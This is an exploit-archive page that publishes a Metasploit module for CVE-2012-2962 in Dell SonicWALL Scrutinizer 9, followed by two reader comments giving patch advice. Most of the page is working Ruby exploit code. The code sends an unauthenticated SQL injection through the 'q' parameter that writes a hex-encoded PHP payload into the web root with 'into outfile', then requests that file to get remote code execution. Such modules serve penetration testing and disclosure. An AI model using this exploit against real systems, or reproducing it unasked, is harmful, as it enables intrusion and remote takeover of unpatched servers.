Exploit the possiblities

Dell SonicWALL Scrutinizer 9 SQL Injection

Dell SonicWALL Scrutinizer 9 SQL Injection
Posted Aug 3, 2012
Authored by muts, sinn3r, Devon Kearns | Site metasploit.com

This Metasploit module exploits a vulnerability found in Dell SonicWall Scrutinizer. While handling the 'q' parameter, the PHP application does not properly filter the user-supplied data, which can be manipulated to inject SQL commands, and then gain remote code execution. Please note that authentication is NOT needed to exploit this vulnerability.

tags | exploit, remote, php, code execution
advisories | CVE-2012-2962, OSVDB-84232
MD5 | 759e78201b01aab52f1b6d318bceac01

Dell SonicWALL Scrutinizer 9 SQL Injection

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info={})
super(update_info(info,
'Name' => "Dell SonicWALL Scrutinizer 9 SQL Injection",
'Description' => %q{
This module exploits a vulnerability found in Dell SonicWall Scrutinizer.
While handling the 'q' parameter, the PHP application does not properly filter
the user-supplied data, which can be manipulated to inject SQL commands, and
then gain remote code execution. Please note that authentication is NOT needed
to exploit this vulnerability.
},
'License' => MSF_LICENSE,
'Author' =>
[
'muts',
'Devon Kearns',
'sinn3r'
],
'References' =>
[
['CVE', '2012-2962'],
['OSVDB', '84232'],
['EDB', '20033'],
['BID', '54625'],
['URL', 'http://www.sonicwall.com/shared/download/Dell_SonicWALL_Scrutinizer_Service_Bulletin_for_SQL_injection_vulnerability_CVE.pdf']
],
'Payload' =>
{
'BadChars' => "\x00"
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' =>
[
# According to advisory, version 9.5.1 and before are vulnerable.
# But was only able to test this on 9.0.1.0
['Dell SonicWall Scrutinizer 9.5.1 or older', {}]
],
'Privileged' => false,
'DisclosureDate' => "Jul 22 2012",
'DefaultTarget' => 0))

register_options(
[
OptString.new('TARGETURI', [true, 'The path to the SonicWall Scrutinizer\'s statusFilter file', '/d4d/statusFilter.php']),
OptString.new('HTMLDIR', [true, 'The HTML root directory for the web application', 'C:\\Program Files\\Scrutinizer\\html\\'])
], self.class)
end


def check
res = send_request_raw({'uri'=>target_uri.host})
if res and res.body =~ /\<title\>Scrutinizer\<\/title\>/ and
res.body =~ /\<div id\=\'.+\'\>Scrutinizer 9\.[0-5]\.[0-1]\<\/div\>/
return Exploit::CheckCode::Vulnerable
end

return Exploit::CheckCode::Safe
end


def exploit
peer = "#{rhost}:#{rport}"
p = "<?php #{payload.encoded} ?>"
hex_payload = p.unpack("H*")[0]
php_fname = Rex::Text.rand_text_alpha(5) + ".php"
rnd_txt = Rex::Text.rand_text_alpha_upper(3)

print_status("#{peer} - Sending SQL injection...")
res = send_request_cgi({
'uri' => target_uri.path,
'method' => 'POST',
'vars_post' => {
'commonJson' => 'protList',
'q' => "#{rnd_txt}' union select 0x#{hex_payload},0 into outfile '../../html/d4d/#{php_fname}'#"
}
})

if res and res.body !~ /No Results Found/
print_error("#{peer} - I don't think the SQL Injection attempt worked")
return
elsif not res
print_error("#{peer} - No response from the server")
return
end

# For debugging purposes, this is useful
vprint_status(res.to_s)

target_path = "#{File.dirname(target_uri.path)}/#{php_fname}"
print_status("#{peer} - Requesting: #{target_path}")
send_request_raw({'uri' => target_path})

handler
end
end

Comments (2)

RSS Feed Subscribe to this comment feed
jansijp

This vulnerability has been resolved in Dell SonicWALL Scrutinizer v9.5.2.

We recommend existing users of Dell SonicWALL Scrutinizer 9.5.0 and earlier versions upgrade to version 9.5.2 to prevent unauthorized queries from being run via the URL by authenticated users. Version 9.5.2 is available for download from www.mysonicwall.com. Users should log onto mySonicWALL and click on Downloads > Download Center in the navigation panel on the left, then select “Scrutinizer Software” in the Software Type drop down menu.

For further information see also this bulletin: www.sonicwall.com/shared/download/Del…

Comment by jansijp
2012-08-06 16:36:54 UTC | Permalink | Reply
jansijp

Also, please note that authentication is not required only when using Scrutinizer v9.0.1. The authentication issue was fixed in 9.5.0 and the SQL injection vulnerability in 9.5.2. We recommend upgrading to 9.5.2.

Comment by jansijp
2012-08-07 16:38:46 UTC | Permalink | Reply
Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

January 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    16 Files
  • 4
    Jan 4th
    39 Files
  • 5
    Jan 5th
    26 Files
  • 6
    Jan 6th
    40 Files
  • 7
    Jan 7th
    2 Files
  • 8
    Jan 8th
    16 Files
  • 9
    Jan 9th
    25 Files
  • 10
    Jan 10th
    28 Files
  • 11
    Jan 11th
    44 Files
  • 12
    Jan 12th
    32 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    4 Files
  • 15
    Jan 15th
    31 Files
  • 16
    Jan 16th
    15 Files
  • 17
    Jan 17th
    16 Files
  • 18
    Jan 18th
    24 Files
  • 19
    Jan 19th
    15 Files
  • 20
    Jan 20th
    5 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close